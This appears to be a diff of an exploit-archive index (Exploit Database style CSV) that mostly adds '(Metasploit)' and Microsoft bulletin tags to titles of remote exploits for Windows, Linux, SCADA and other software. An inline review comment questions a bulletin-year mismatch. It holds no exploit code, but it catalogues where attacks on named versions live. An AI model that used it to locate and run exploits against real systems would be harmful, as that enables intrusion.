 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow (Metasploit)",2011-06-27,Metasploit,windows,remote,0
 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager - POST Query Buffer Overflow (Metasploit)",2011-06-12,Metasploit,windows,remote,0
-17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050)",2011-06-17,Metasploit,windows,remote,0
+17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit)",2011-06-17,Metasploit,windows,remote,0
 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0
 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,windows,remote,0
 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow (Metasploit)",2011-06-20,Metasploit,windows,remote,0
@@ -10969,7 +10978,7 @@ id,file,description,date,author,platform,type,port
 17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server - DATAC Login Buffer Overflow (Metasploit)",2011-06-22,Metasploit,windows,remote,0
 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall - Bypass Exploit",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0
 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Parameter Buffer Overflow (Metasploit)",2011-06-25,Metasploit,windows,remote,0
-17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,Metasploit,windows,remote,0
+17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)",2011-06-23,Metasploit,windows,remote,0
 17460,platforms/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,windows,remote,0
 17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,kingcope,freebsd,remote,0
 17467,platforms/windows/remote/17467.rb,"HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,windows,remote,5555
@@ -10983,7 +10992,7 @@ id,file,description,date,author,platform,type,port
 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow (Metasploit)",2011-07-09,Metasploit,windows,remote,0
 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - MiTM Attack",2011-07-09,Nibin,windows,remote,0
 17519,platforms/windows/remote/17519.py,"Freefloat FTP Server - 'LIST' Command Buffer Overflow",2011-07-10,"Zer0 Thunder",windows,remote,0
-17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (1)",2011-07-10,Metasploit,windows,remote,0
+17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1)",2011-07-10,Metasploit,windows,remote,0
 17527,platforms/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0
 17535,platforms/multiple/remote/17535.rb,"Java RMI - Server Insecure Default Configuration Java Code Execution (Metasploit)",2011-07-15,Metasploit,multiple,remote,0
 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow (Metasploit)",2011-07-16,Metasploit,windows,remote,0
@@ -11006,9 +11015,9 @@ id,file,description,date,author,platform,type,port
 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0
 17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Root Shell",2011-08-10,SZ,linux,remote,0
 17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0
-17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (1)",2011-08-10,Metasploit,windows,remote,0
+17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,windows,remote,0
 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,windows,remote,0
-17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,Metasploit,windows,remote,0
+17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,windows,remote,0
 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0
 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote,0
 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use-After-Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0
@@ -11033,12 +11042,12 @@ id,file,description,date,author,platform,type,port
 17886,platforms/windows/remote/17886.py,"Freefloat FTP Server - Buffer Overflow (DEP Bypass)",2011-09-23,blake,windows,remote,0
 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0
 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
-17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0
+17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0
 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
-17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (2)",2011-10-13,Metasploit,windows,remote,0
+17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0
 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
 17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0
 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation (Metasploit)",2011-10-18,Metasploit,windows,remote,0
@@ -11075,11 +11084,11 @@ id,file,description,date,author,platform,type,port
 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow",2012-01-10,b33f,windows,remote,0
 18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter)",2012-01-12,TheXero,windows,remote,0
 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport - Remote Command Execution (Metasploit)",2012-01-17,Metasploit,windows,remote,0
-18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (Metasploit)",2012-01-14,Metasploit,windows,remote,0
+18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0
 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0
 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Buffer Overflow (Metasploit)",2012-01-14,Metasploit,linux,remote,0
 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0
-18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (2)",2012-01-17,Metasploit,osx,remote,0
+18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0
 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0
 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",windows,remote,0
 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager - 'ov.dll' _OVBuildPath Buffer Overflow (Metasploit)",2012-01-20,Metasploit,windows,remote,0
@@ -11089,7 +11098,7 @@ id,file,description,date,author,platform,type,port
 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow (Metasploit)",2012-04-04,Metasploit,windows,remote,0
 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0
 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - magentservice.exe Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote,0
-18426,platforms/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,Metasploit,windows,remote,0
+18426,platforms/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)",2012-01-28,Metasploit,windows,remote,0
 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution",2012-01-31,Abysssec,windows,remote,0
 18442,platforms/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0
 18446,platforms/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",android,remote,0
@@ -11100,7 +11109,7 @@ id,file,description,date,author,platform,type,port
 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote,0
 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object - GM_Song Structure Handling (Metasploit)",2012-02-16,Metasploit,windows,remote,0
 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 - Backdoor Arbitrary PHP Code Execution (Metasploit)",2012-02-17,Metasploit,linux,remote,0
-18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012)",2012-02-24,Metasploit,windows,remote,0
+18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)",2012-02-24,Metasploit,windows,remote,0
 18514,platforms/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,windows,remote,0
 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)",2012-02-25,Metasploit,windows,remote,0
 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
@@ -11127,7 +11136,7 @@ id,file,description,date,author,platform,type,port
 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Root Remote Code Execution)",2012-05-26,muts,linux,remote,0
 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote,0
 18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0
-18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,Metasploit,windows,remote,0
+18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0
 18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
 18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0
 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - (vncviewer.exe) Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0
@@ -11147,7 +11156,7 @@ id,file,description,date,author,platform,type,port
 18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0
 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution (Metasploit)",2012-04-20,Metasploit,linux,remote,0
 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0
-18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,Metasploit,windows,remote,0
+18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,windows,remote,0
 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,hardware,remote,0
 18833,platforms/windows/remote/18833.rb,"SolarWinds Storage Manager 5.1.0 - SQL Injection (Metasploit)",2012-05-04,Metasploit,windows,remote,0
 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0
@@ -11166,7 +11175,7 @@ id,file,description,date,author,platform,type,port
 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)",2012-05-21,Metasploit,hardware,remote,0
 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow (Metasploit)",2012-05-23,Metasploit,windows,remote,0
 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 - Log Entry sprintf() Buffer Overflow (Metasploit)",2012-05-25,Metasploit,windows,remote,0
-18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (2)",2012-05-27,Metasploit,windows,remote,0
+18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (Metasploit) (2)",2012-05-27,Metasploit,windows,remote,0
 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 - Command Execution (Metasploit)",2012-05-28,Metasploit,linux,remote,0
 19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog 2.07.14 - Buffer Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0
 18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0
@@ -11175,7 +11184,7 @@ id,file,description,date,author,platform,type,port
 18973,platforms/windows/remote/18973.rb,"GIMP script-fu - Server Buffer Overflow (Metasploit)",2012-06-02,Metasploit,windows,remote,0
 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0
 19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX BackupToAvi() Remote Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0
-19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0
+19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)",2012-06-08,Metasploit,windows,remote,0
 19002,platforms/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution (Metasploit)",2012-06-06,Metasploit,windows,remote,0
 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote,0
 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug exploit",1988-08-01,anonymous,linux,remote,0
@@ -11220,7 +11229,7 @@ id,file,description,date,author,platform,type,port
 19127,platforms/multiple/remote/19127.txt,"Verity Search97 2.1 - Security",1998-07-14,"Stefan Arentz",multiple,remote,0
 19129,platforms/multiple/remote/19129.txt,"Microsoft IIS 4.0 / Microsoft Site Server 3.0 - Showcode ASP",1999-05-07,L0pht,multiple,remote,0
 19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server 5.30 - Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0
-19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,Metasploit,windows,remote,0
+19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) (Metasploit)",2012-06-14,Metasploit,windows,remote,0
 19147,platforms/windows/remote/19147.txt,"Microsoft IIS4 (Windows NT) - Remote Web-Based Administration",1999-01-14,Mnemonix,windows,remote,0
 19149,platforms/windows/remote/19149.c,"Microsoft IIS4 (Windows NT) - Log Avoidance",1999-01-22,Mnemonix,windows,remote,0
 19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 - IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,windows,remote,0
@@ -11228,8 +11237,8 @@ id,file,description,date,author,platform,type,port
 19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 - Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",windows,remote,0
 19402,platforms/hardware/remote/19402.txt,"Western Digital's WD TV Live SMP/Hub - Root Exploit",2012-06-26,"Wolfgang Borst",hardware,remote,0
 19164,platforms/windows/remote/19164.txt,"Microsoft Internet Explorer 4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0
-19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0
-19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (Metasploit)",2012-06-16,Metasploit,windows,remote,0
+19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)",2012-06-15,Metasploit,windows,remote,0
+19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)",2012-06-16,Metasploit,windows,remote,0
 19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote,0
 19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0
 19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0
@@ -11320,7 +11329,7 @@ id,file,description,date,author,platform,type,port
 19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (2)",1998-03-17,Rootshell,hardware,remote,0
 19557,platforms/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon",1995-07-31,"Paul Phillips",linux,remote,0
 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",linux,remote,0
-19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL redirection",1999-10-18,"Georgi Guninski",windows,remote,0
+19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043)",1999-10-18,"Georgi Guninski",windows,remote,0
 19560,platforms/multiple/remote/19560.c,"Washington University WU-FTPD 2.5.0 - message Buffer Overflow",1999-10-19,typo/teso,multiple,remote,0
 19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",windows,remote,0
 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0
@@ -11340,7 +11349,7 @@ id,file,description,date,author,platform,type,port
 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0
 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities",1999-11-03,Kerb,windows,remote,0
 19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0
-20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution (Metasploit)",2012-07-31,Metasploit,windows,remote,8082
+20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)",2012-07-31,Metasploit,windows,remote,8082
 20120,platforms/windows/remote/20120.pl,"httpdx 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0
 19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",multiple,remote,0
 19607,platforms/windows/remote/19607.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (1)",1999-11-09,UNYUN,windows,remote,0
@@ -11398,7 +11407,7 @@ id,file,description,date,author,platform,type,port
 19737,platforms/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 - Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,windows,remote,0
 19738,platforms/windows/remote/19738.txt,"Microsoft Outlook Express 5 - JavaScript Email Access",2000-02-01,"Georgi Guninski",windows,remote,0
 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 - SQL Command Input",2000-02-03,"rain forest puppy",cgi,remote,0
-19742,platforms/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0
+19742,platforms/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,multiple,remote,0
 19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U FTP Server 2.5/a/b (Windows 2000/95/98/NT 4.0) - Shortcut Exploit",2000-02-04,"Ussr Labs",windows,remote,0
 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 Beta - Pipe",2000-02-04,"Iain Wade",cgi,remote,0
 19747,platforms/cgi/remote/19747.txt,"Zeus Web Server 3.x - Null Terminated Strings",2000-02-08,"Vanja Hrustic",cgi,remote,0
@@ -11563,7 +11572,7 @@ id,file,description,date,author,platform,type,port
 20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0
 20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0
 20168,platforms/php/remote/20168.pl,"pBot - Remote Code Execution",2012-08-01,bwall,php,remote,0
-20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (Metasploit)",2012-08-02,Metasploit,windows,remote,0
+20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)",2012-08-02,Metasploit,windows,remote,0
 20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0
 20177,platforms/cgi/remote/20177.html,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0
 20180,platforms/windows/remote/20180.c,"RobTex Viking Server 1.0.6 Build 355 - Buffer Overflow",2000-08-28,wildcoyote,windows,remote,0
@@ -11669,7 +11678,7 @@ id,file,description,date,author,platform,type,port
 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
 20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script Exploit",1997-07-15,"Francisco Torres",cgi,remote,0
 20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0
-20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - Index.dat",2000-11-23,"Georgi Guninski",windows,remote,0
+20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055)",2000-11-23,"Georgi Guninski",windows,remote,0
 20427,platforms/windows/remote/20427.txt,"Microsoft Windows Media Player 7.0 - '.asx' Buffer Overflow",2000-11-22,@stake,windows,remote,0
 20429,platforms/jsp/remote/20429.txt,"Caucho Technology Resin 1.2 - JSP Source Disclosure",2000-11-23,benjurry,jsp,remote,0
 20430,platforms/cgi/remote/20430.txt,"Info2www 1.0/1.1 - CGI Input Handling",1998-03-03,"Niall Smart",cgi,remote,0
@@ -11917,7 +11926,7 @@ id,file,description,date,author,platform,type,port
 20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure",2001-06-21,ViperSV,windows,remote,0
 20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Show Path",2001-06-21,ViperSV,windows,remote,0
 20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support - Buffer Overflow",2001-06-21,"NSFOCUS Security Team",windows,remote,0
-20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support - Buffer Overflow (Metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0
+20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support - Buffer Overflow (MS03-051) (Metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0
 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,linux,remote,0
 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String (3)",2006-10-06,mu-b,linux,remote,0
 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 - Reverse Proxy",2001-07-18,"Paul Nasrat",linux,remote,0
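Review bot: The bulletin tag added to row 20951, `(MS03-051)`, names a 2003 bulletin while the row's date column reads 2001-06-21, and the sibling row 20950 with the same title is left untagged. If both rows cover the same flaw they should carry the same bulletin, and the id should be checked against the advisory the exploit actually targets, since readers use these tags to map index entries to patch coverage. A similar year mismatch appears at row 21613 in the `@@ -12153,7` hunk (`(MS99-027)` on an entry dated 2002-07-12); it may well be correct, but is worth a second look.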
@@ -11963,7 +11972,7 @@ id,file,description,date,author,platform,type,port
 21067,platforms/multiple/remote/21067.c,"Apache 1.0/1.2/1.3 - Server Address Disclosure",2001-08-21,magnum,multiple,remote,0
 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 - File Retrieval",2001-08-31,"Hannibal Lector",cgi,remote,0
 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb - Arbitrary Command Execution",2001-08-02,"Maurycy Prodeus",linux,remote,0
-21080,platforms/multiple/remote/21080.rb,"JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,Metasploit,multiple,remote,0
+21080,platforms/multiple/remote/21080.rb,"JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)",2012-09-05,Metasploit,multiple,remote,0
